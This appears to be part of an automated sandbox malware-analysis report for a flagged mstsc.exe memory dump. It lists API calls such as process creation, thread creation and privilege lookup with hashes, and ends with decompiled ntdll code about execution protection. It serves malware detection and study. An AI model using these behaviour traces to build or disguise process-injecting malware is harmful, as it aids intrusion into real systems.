                                                                                                                                                                                      • Opcode Fuzzy Hash: f7da3335141b60c58d4a1a1c729bc0f0e5c200c02283b11a76dedf29671fac5f
                                                                                                                                                                                      • Instruction Fuzzy Hash: B601A731A803287BE720A6958C43FFE776C5B40B54F04052AFF05BA1C1E6A9790647EE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 0040F8B8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 30d78308174c8d3710ef9c00a618afaa4392ccecade2912a63ba685d82bbf539
                                                                                                                                                                                      • Instruction ID: 84c2d539add8576f81e94c0608a7815ac878b90178c2c182a4b0f427a06ded85
                                                                                                                                                                                      • Opcode Fuzzy Hash: 30d78308174c8d3710ef9c00a618afaa4392ccecade2912a63ba685d82bbf539
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C51A8BA5103047BD724EB55CC85FEBB37CAF44304F00469EBA5A67192EE34AB858F64
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AC42
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Load
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                                                      • Opcode ID: 064fc8b9e47045ed70fd012ce6989d3b14e09ff0de191e258dc97656c0333484
                                                                                                                                                                                      • Instruction ID: a84720085716a6fc8858d1dc3943f1d2e317cdfdeb3346d89e0731b250131a0e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 064fc8b9e47045ed70fd012ce6989d3b14e09ff0de191e258dc97656c0333484
                                                                                                                                                                                      • Instruction Fuzzy Hash: A70112B5E0020DB7DF10DBA5DC42FDEB7789B54308F0041A5A90CA7281F635EB598B55
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 0041CB34
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                                                                      • Opcode ID: 67b4801cc9e007946cf2de4f7bf113db1f8f23bce19d7b0b374cb61264add63a
                                                                                                                                                                                      • Instruction ID: 94b5f9356afc4def01eaef5d2362140d7c409ed6e3217643a43190e4242ed66b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 67b4801cc9e007946cf2de4f7bf113db1f8f23bce19d7b0b374cb61264add63a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F01F2B2204548AFCB04DF99DC80DEB7BA9AF8D254F15825DFA9D97241C634E851CBA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 0041CB34
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                                                                      • Opcode ID: bec94458cd42806910d4d3acd5553c417a3fa2ad3fa69b939821d7d23a8d2164
                                                                                                                                                                                      • Instruction ID: a4f09b6f3b51d35dfb6bd5a9f055ec3ca7790bc1532e88df1c71f688987c854c
                                                                                                                                                                                      • Opcode Fuzzy Hash: bec94458cd42806910d4d3acd5553c417a3fa2ad3fa69b939821d7d23a8d2164
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4201B2B2210108BFCB58DF89DC80EEB77ADAF8C754F118258BA0D97241C630E851CBA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,DA03FB32,00000000,00000000,?,?,?,DA03FB32,?), ref: 0041B5AC
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                      • Opcode ID: db8cae8b210e7ee44c1b274500cc9dfb76c6f2e2d86d0d702de0e5103afbc90e
                                                                                                                                                                                      • Instruction ID: f43173d51227db3bd23b72488862089d0f24054ec7d79824331d5b62bb54be71
                                                                                                                                                                                      • Opcode Fuzzy Hash: db8cae8b210e7ee44c1b274500cc9dfb76c6f2e2d86d0d702de0e5103afbc90e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 40E0923338131436E32061A9EC03FEBB39CDB94B25F54006AFA0DEB2C1D595F94142E8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(004169F6,?,0041719D,0041719D,?,004169F6,?,?,?,?,?,00000000,00000005,00000206), ref: 0041CA5D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                      • Opcode ID: df6601c4fa938440892edf3d2c471e8810c3767b6256e6a185f84a6a6d30c4d5
                                                                                                                                                                                      • Instruction ID: f1d32f6383ba22cf81a479c00cc99778775cb5ec67990ce4f7b6f36ed1160083
                                                                                                                                                                                      • Opcode Fuzzy Hash: df6601c4fa938440892edf3d2c471e8810c3767b6256e6a185f84a6a6d30c4d5
                                                                                                                                                                                      • Instruction Fuzzy Hash: AFF0A0753402186BDA20EBA9CC40EE7B79EEF84794F14859AFA889B202C571A905C7E1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040DC42,0040DC42,?,00000000,?,?), ref: 0041CC00
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                                                      • Opcode ID: e7dd7b10fdc4d90a4fd07695763aa2b61e0cf164094e504a83b290d7e9fc7ec7
                                                                                                                                                                                      • Instruction ID: 97bc79966094bdb00082e7ca76b421f5850628bf70862b682047c3a50691e733
                                                                                                                                                                                      • Opcode Fuzzy Hash: e7dd7b10fdc4d90a4fd07695763aa2b61e0cf164094e504a83b290d7e9fc7ec7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 65E0E5B12402087BD710DF48DC82EE7736CEF85750F148415B90CA7341C134F84086B5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,DA03FB32,00000000,00000000,?,?,?,DA03FB32,?), ref: 0041B5AC
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                      • Opcode ID: 53fa50d7eb5dbff7b19a609d93be8a55ad6b0e0d9437e2c3ed43291ce22a0659
                                                                                                                                                                                      • Instruction ID: 95b1c5608ca59d9a5594ff0806a1be3d24f310fb9c5fb0daef83ab544072c2ca
                                                                                                                                                                                      • Opcode Fuzzy Hash: 53fa50d7eb5dbff7b19a609d93be8a55ad6b0e0d9437e2c3ed43291ce22a0659
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1E0923238130432E22022599C43FD77358CB94B14F14001AFA09AB2C1D595B94142A8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00413D02,?,?,00413D02,00000000,?), ref: 0040E30A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 39062ff23a36d6dfe8624dac98c7a8fc5e15a83962db71ea4cb7ae81496a11e5
                                                                                                                                                                                      • Instruction ID: 3e1043d0537673a7a2742653d1b43163af778dc9b2d97485ce023473315013ee
                                                                                                                                                                                      • Opcode Fuzzy Hash: 39062ff23a36d6dfe8624dac98c7a8fc5e15a83962db71ea4cb7ae81496a11e5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 93E0867128020827FB2866A9DC46F6B73588B88724F184AE5FD1CEB3C2D67DF9518158
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,0040889A,?), ref: 0040E11B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                      • Opcode ID: 4e93a443b8b69536e6177629f776be652ef008a54c3b3b0129f7797a997defe5
                                                                                                                                                                                      • Instruction ID: fcb264dcc9d2bf8d6f88a44ca720f7298848949b131671c45d80b59a0cd32a85
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e93a443b8b69536e6177629f776be652ef008a54c3b3b0129f7797a997defe5
                                                                                                                                                                                      • Instruction Fuzzy Hash: C6E08672A902046BE710DBA09C43F6A73949B55341F0500B9FD0AEB2C3D635E4128524
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041CA9D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                      • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                                                                                                                                      • Instruction ID: 01e722e062909351aa3f758eb4fe39d513d3daeaf693b8f616b582593d416846
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE04FB12002186BD714DF49DC49ED777ACEF88750F014155FD0957241C570F914CAF1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(004169F6,?,0041719D,0041719D,?,004169F6,?,?,?,?,?,00000000,00000005,00000206), ref: 0041CA5D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                      • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                                                                                                                                      • Instruction ID: 192df3289137e9b8e74499d7b23cc42d10b4cd26009e9f55c8e6a607e5acdead
                                                                                                                                                                                      • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE046B1200218ABDB18EF99DC45EEB77ACEF88754F018159FE099B242C670F910CAF1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040DC42,0040DC42,?,00000000,?,?), ref: 0041CC00
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                                                      • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                                                                                                                                      • Instruction ID: a2219779e95e595fedaee31655f95514184601cb5649233e52d2a0dc8c563d46
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                                                                                                                                      • Instruction Fuzzy Hash: DFE01AB16002186BD710DF49CC45EE777ADAF88650F118159BE0957241C670E8108AB5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,0040889A,?), ref: 0040E11B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                      • Opcode ID: af57193603f7944561e76fce7887abcdc7fa1c82de23c8cf729f6e0b6c60e868
                                                                                                                                                                                      • Instruction ID: 80904f6fea4a258b0cabc6354f01101ccd875a6b70a9bf5bf35e92f2d6f99892
                                                                                                                                                                                      • Opcode Fuzzy Hash: af57193603f7944561e76fce7887abcdc7fa1c82de23c8cf729f6e0b6c60e868
                                                                                                                                                                                      • Instruction Fuzzy Hash: C8D05E7168030826F610A6E59C03F5672889B48A45F0500A4F909AA3C3D964F5004568
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 642a892f5ea96cd9524b5c0a461e2a5bedb36584ec206b432acbe140c459715d
                                                                                                                                                                                      • Instruction ID: 4e50968dd9b8dbe40b038b483a38752a320c68236251eac9d93e525e5d5e1512
                                                                                                                                                                                      • Opcode Fuzzy Hash: 642a892f5ea96cd9524b5c0a461e2a5bedb36584ec206b432acbe140c459715d
                                                                                                                                                                                      • Instruction Fuzzy Hash: F8B02B318014C0C6FB00EF20070C707390077D0306F11C051E1030340E4738D080F131
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 63%
                                                                                                                                                                                      			E04617550(void* __ecx) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				char _v548;
                                                                                                                                                                                      				unsigned int _v552;
                                                                                                                                                                                      				unsigned int _v556;
                                                                                                                                                                                      				unsigned int _v560;
                                                                                                                                                                                      				char _v564;
                                                                                                                                                                                      				char _v568;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				unsigned int _t49;
                                                                                                                                                                                      				signed char _t53;
                                                                                                                                                                                      				unsigned int _t55;
                                                                                                                                                                                      				unsigned int _t56;
                                                                                                                                                                                      				unsigned int _t65;
                                                                                                                                                                                      				unsigned int _t66;
                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                      				unsigned int _t73;
                                                                                                                                                                                      				unsigned int _t77;
                                                                                                                                                                                      				unsigned int _t85;
                                                                                                                                                                                      				char* _t98;
                                                                                                                                                                                      				unsigned int _t102;
                                                                                                                                                                                      				signed int _t103;
                                                                                                                                                                                      				void* _t105;
                                                                                                                                                                                      				signed int _t107;
                                                                                                                                                                                      				void* _t108;
                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                      				void* _t112;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t45 =  *0x46db370 ^ _t107;
                                                                                                                                                                                      				_v8 =  *0x46db370 ^ _t107;
                                                                                                                                                                                      				_t105 = __ecx;
                                                                                                                                                                                      				if( *0x46d6664 == 0) {
                                                                                                                                                                                      					L5:
                                                                                                                                                                                      					return E04624B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t85 = 0;
                                                                                                                                                                                      				E045EE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
                                                                                                                                                                                      				if(( *0x7ffe02d5 & 0x00000003) == 0) {
                                                                                                                                                                                      					_t45 = 0;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t45 =  *(_v564 + 0x5f) & 0x00000001;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if(_t45 == 0) {
                                                                                                                                                                                      					_v556 = _t85;
                                                                                                                                                                                      					_t49 = E04617738(_t105);
                                                                                                                                                                                      					__eflags = _t49;
                                                                                                                                                                                      					if(_t49 != 0) {
                                                                                                                                                                                      						L15:
                                                                                                                                                                                      						_t103 = 2;
                                                                                                                                                                                      						_v556 = _t103;
                                                                                                                                                                                      						L10:
                                                                                                                                                                                      						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
                                                                                                                                                                                      						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
                                                                                                                                                                                      							_t45 = 1;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t53 = E0461763B(_v564);
                                                                                                                                                                                      							asm("sbb al, al");
                                                                                                                                                                                      							_t45 =  ~_t53 + 1;
                                                                                                                                                                                      							__eflags = _t45;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t45;
                                                                                                                                                                                      						if(_t45 == 0) {
                                                                                                                                                                                      							_t102 = _t103 | 0x00000040;
                                                                                                                                                                                      							_v556 = _t102;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t102;
                                                                                                                                                                                      						if(_t102 != 0) {
                                                                                                                                                                                      							L33:
                                                                                                                                                                                      							_push(4);
                                                                                                                                                                                      							_push( &_v556);
                                                                                                                                                                                      							_push(0x22);
                                                                                                                                                                                      							_push(0xffffffff);
                                                                                                                                                                                      							_t45 = E04622B70();
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_v552 = _t85;
                                                                                                                                                                                      					_t102 =  &_v552;
                                                                                                                                                                                      					_t55 = E046176ED(_t105 + 0x2c, _t102);
                                                                                                                                                                                      					__eflags = _t55;
                                                                                                                                                                                      					if(_t55 >= 0) {
                                                                                                                                                                                      						__eflags = _v552 - _t85;
                                                                                                                                                                                      						if(_v552 == _t85) {
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t85 = _t105 + 0x24;
                                                                                                                                                                                      						E0466EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
                                                                                                                                                                                      						_v560 = 0x214;
                                                                                                                                                                                      						E04628F40( &_v548, 0, 0x214);
                                                                                                                                                                                      						_t106 =  *0x46d6664;
                                                                                                                                                                                      						_t110 = _t108 + 0x20;
                                                                                                                                                                                      						 *0x46d91e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
                                                                                                                                                                                      						_t65 =  *((intOrPtr*)( *0x46d6664))();
                                                                                                                                                                                      						__eflags = _t65;
                                                                                                                                                                                      						if(_t65 == 0) {
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t66 = _v560;
                                                                                                                                                                                      						__eflags = _t66;
                                                                                                                                                                                      						if(_t66 == 0) {
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t66 - 0x214;
                                                                                                                                                                                      						if(_t66 >= 0x214) {
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t68 = (_t66 >> 1) * 2 - 2;
                                                                                                                                                                                      						__eflags = _t68 - 0x214;
                                                                                                                                                                                      						if(_t68 >= 0x214) {
                                                                                                                                                                                      							E04624C68();
                                                                                                                                                                                      							goto L33;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push(_t85);
                                                                                                                                                                                      						 *((short*)(_t107 + _t68 - 0x220)) = 0;
                                                                                                                                                                                      						E0466EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
                                                                                                                                                                                      						_t111 = _t110 + 0x14;
                                                                                                                                                                                      						_t73 = E0462A9C0( &_v548, L"Execute=1");
                                                                                                                                                                                      						_push(_t85);
                                                                                                                                                                                      						__eflags = _t73;
                                                                                                                                                                                      						if(_t73 == 0) {
                                                                                                                                                                                      							E0466EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
                                                                                                                                                                                      							_t106 =  &_v548;
                                                                                                                                                                                      							_t98 =  &_v548;
                                                                                                                                                                                      							_t112 = _t111 + 0x14;
                                                                                                                                                                                      							_t77 = _v560 + _t98;
                                                                                                                                                                                      							_v552 = _t77;
                                                                                                                                                                                      							__eflags = _t98 - _t77;
                                                                                                                                                                                      							if(_t98 >= _t77) {
                                                                                                                                                                                      								goto L8;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L27;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							do {
                                                                                                                                                                                      								L27:
                                                                                                                                                                                      								_t85 = E0462A690(_t106, 0x20);
                                                                                                                                                                                      								__eflags = _t85;
                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                      									__eflags = 0;
                                                                                                                                                                                      									 *_t85 = 0;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								E0466EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
                                                                                                                                                                                      								_t112 = _t112 + 0x10;
                                                                                                                                                                                      								E0465CC1E(_t105, _t106, __eflags);
                                                                                                                                                                                      								__eflags = _t85;
                                                                                                                                                                                      								if(_t85 == 0) {
                                                                                                                                                                                      									goto L8;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t41 = _t85 + 2; // 0x2
                                                                                                                                                                                      								_t106 = _t41;
                                                                                                                                                                                      								__eflags = _t106 - _v552;
                                                                                                                                                                                      							} while (_t106 < _v552);
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                                      						_push(3);
                                                                                                                                                                                      						_push(0x55);
                                                                                                                                                                                      						E0466EF10();
                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L8:
                                                                                                                                                                                      					_t56 = E04617648(_t105);
                                                                                                                                                                                      					__eflags = _t56;
                                                                                                                                                                                      					if(_t56 != 0) {
                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t103 = _v556;
                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L4:
                                                                                                                                                                                      					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}
































                                                                                                                                                                                      0x04617560
                                                                                                                                                                                      0x04617562
                                                                                                                                                                                      0x0461756f
                                                                                                                                                                                      0x04617571
                                                                                                                                                                                      0x046175ab
                                                                                                                                                                                      0x046175b9
                                                                                                                                                                                      0x046175b9
                                                                                                                                                                                      0x04617579
